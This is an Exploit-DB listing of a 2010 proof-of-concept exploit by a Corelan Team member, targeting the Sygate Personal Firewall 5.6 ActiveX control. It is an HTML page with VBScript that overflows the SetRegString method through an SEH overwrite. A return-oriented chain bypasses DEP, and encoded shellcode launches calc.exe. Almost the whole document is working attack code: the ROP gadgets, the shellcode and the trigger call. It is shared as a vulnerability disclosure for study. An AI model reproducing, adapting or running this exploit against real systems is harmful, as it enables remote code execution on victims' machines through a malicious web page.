Sygate Personal Firewall 5.6 build 2808 - ActiveX with DEP Bypass

EDB-ID:

13834


Author:

Lincoln

Type:

remote


Platform:

Windows

Date:

2010-06-11


<html>
<!--
        |------------------------------------------------------------------|
        |                         __               __                      |
        |   _________  ________  / /___ _____     / /____  ____ _____ ___  |
        |  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |
        | / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |
        | \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |
        |                                                                  |
        |                                       http://www.corelan.be:8800 |
        |                                              security@corelan.be |
        |                                                                  |
        |-------------------------------------------------[ EIP Hunters ]--|
  
# Software      : Sygate Personal Firewall 5.6 build 2808 ActiveX w/ DEP bypass
# Author        : Lincoln
# Date      	: June 11, 2010
# Reference     : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-050
# OS            : Windows
# Tested on     : XP SP3 En (VirtualBox)
# Type of vuln  : SEH
# Greetz to     : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
#
# Bad Chars: 80-9f (makes for extra fun)
# Tested on IE 7/6 , nop slide used
#
#
-->

<object classid='clsid:D59EBAD7-AF87-4A5C-8459-D3F6B918E7C9' id='target' ></object>
<script language='vbscript'>

seh   = unescape("%13%16%47%06") 	'#ADD ESP,46C # RETN


rop = rop + String(72, "D") 		'#Junk
rop = rop + unescape("%19%16%47%06")	'#Nop
rop = rop + unescape("%19%16%47%06")	'#Nop
rop = rop + unescape("%19%16%47%06")	'#Nop
rop = rop + unescape("%19%16%47%06")	'#Nop
rop = rop + unescape("%19%16%47%06")	'#Nop
rop = rop + unescape("%19%16%47%06")	'#Nop
rop = rop + unescape("%19%16%47%06")	'#Nop

'#edx
rop = rop + unescape("%33%b6%44%06")	'#POP EBP # RETN
rop = rop + unescape("%01%c0%4b%06")	
rop = rop + unescape("%65%b9%47%06")	'#MOV EDX,EBP # POP REGISTERS CHAIN #RETN

'#alignment					
rop = rop + unescape("%7c%bd%47%06")	'#POP data into registers	
rop = rop + unescape("%49%50%45%06")	
rop = rop + unescape("%41%41%41%41")	
rop = rop + unescape("%ff%ff%ff%ff")	
rop = rop + unescape("%50%50%50%50")	

'#ebx 
rop = rop + unescape("%b2%7d%48%06")    '#ADD EAX,80 # POP EBP # RETN
rop = rop + unescape("%41%41%41%41")	'#Junk
rop = rop + unescape("%b2%7d%48%06")    '#ADD EAX,80 # POP EBP # RETN
rop = rop + unescape("%41%41%41%41")	'#Junk
rop = rop + unescape("%b2%7d%48%06")    '#ADD EAX,80 # POP EBP # RETN
rop = rop + unescape("%41%41%41%41")	'#Junk
rop = rop + unescape("%d9%c4%47%06")	'#ADD EBX,EAX # PUSH 1 # POP EAX # RETN 

'#ebp
rop = rop + unescape("%dd%c4%47%06")	'#POP EAX # RETN
rop = rop + unescape("%1f%73%d0%cc")    
rop = rop + unescape("%ae%f5%47%06")    '#SUB EAX,ECX # RETN
rop = rop + unescape("%30%14%45%06")	'#MOV EBP,EAX # CALL ESI

'#esi
rop = rop + unescape("%22%cd%46%06")	'#POP ESI # RETN
rop = rop + unescape("%ff%ff%ff%ff")	

'#eax
rop = rop + unescape("%dd%c4%47%06")	'#POP EAX # RETN
rop = rop + unescape("%63%72%d0%cc")    
rop = rop + unescape("%ae%f5%47%06")    '#SUB EAX,ECX # RETN 

'#game over
rop = rop + unescape("%47%71%49%06")	'#PUSHAD (throw it all on the stack baby!)


'[*] Using Msf::Encoder::Alpha2 with final size of 338 bytes cmd=calc.exe
sc = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49") & _
unescape("%49%49%49%49%49%49%49%49%49%48%49%49%51%5a%6a%45") & _
unescape("%58%30%41%31%50%41%42%6b%42%41%55%32%42%42%32%41") & _
unescape("%41%30%41%41%58%42%38%42%42%50%75%6d%39%39%6c%6d") & _
unescape("%38%57%34%77%70%67%70%33%30%4c%4b%63%75%75%6c%6c") & _
unescape("%4b%41%6c%75%55%64%38%55%51%4a%4f%4c%4b%42%6f%46") & _
unescape("%78%4e%6b%61%4f%77%50%65%51%78%6b%63%79%4c%4b%47") & _
unescape("%44%6e%6b%47%71%48%6e%65%61%59%50%6e%79%6c%6c%4f") & _
unescape("%74%4f%30%50%74%47%77%6a%61%5a%6a%54%4d%64%41%5a") & _
unescape("%62%68%6b%4a%54%55%6b%42%74%74%64%47%74%70%75%6b") & _
unescape("%55%6c%4b%61%4f%76%44%66%61%5a%4b%71%76%6c%4b%54") & _
unescape("%4c%72%6b%4c%4b%53%6f%77%6c%56%61%7a%4b%4e%6b%65") & _
unescape("%4c%6c%4b%77%71%38%6b%6b%39%43%6c%71%34%74%44%59") & _
unescape("%53%67%41%6f%30%63%54%6e%6b%63%70%70%30%4e%65%4b") & _
unescape("%70%61%68%36%6c%6c%4b%63%70%46%6c%4c%4b%54%30%77") & _
unescape("%6c%4c%6d%6e%6b%55%38%57%78%38%6b%36%69%6e%6b%6f") & _
unescape("%70%4e%50%73%30%75%50%55%50%6e%6b%33%58%77%4c%43") & _
unescape("%6f%50%31%59%66%65%30%33%66%6e%69%69%68%4f%73%4b") & _
unescape("%70%53%4b%42%70%30%68%4a%50%6e%6a%65%54%51%4f%52") & _
unescape("%48%6f%68%4b%4e%6c%4a%66%6e%33%67%4b%4f%6d%37%51") & _
unescape("%73%50%61%62%4c%70%63%56%4e%73%55%73%48%41%75%47") & _
unescape("%70%45")


junk  = String(2814, "D") '3128
mjunk = String(25000, "A")

arg1=1
arg2=1
arg3= rop + sc + junk + seh + mjunk
arg4="defaultV"
arg5="defaultV"

target.SetRegString arg1 ,arg2 ,arg3 ,arg4 ,arg5 

</script>
<b><center>Sygate Personal Firewall 5.6 build 2808 ActiveX exploit w/ DEP bypass</b></center>
</html>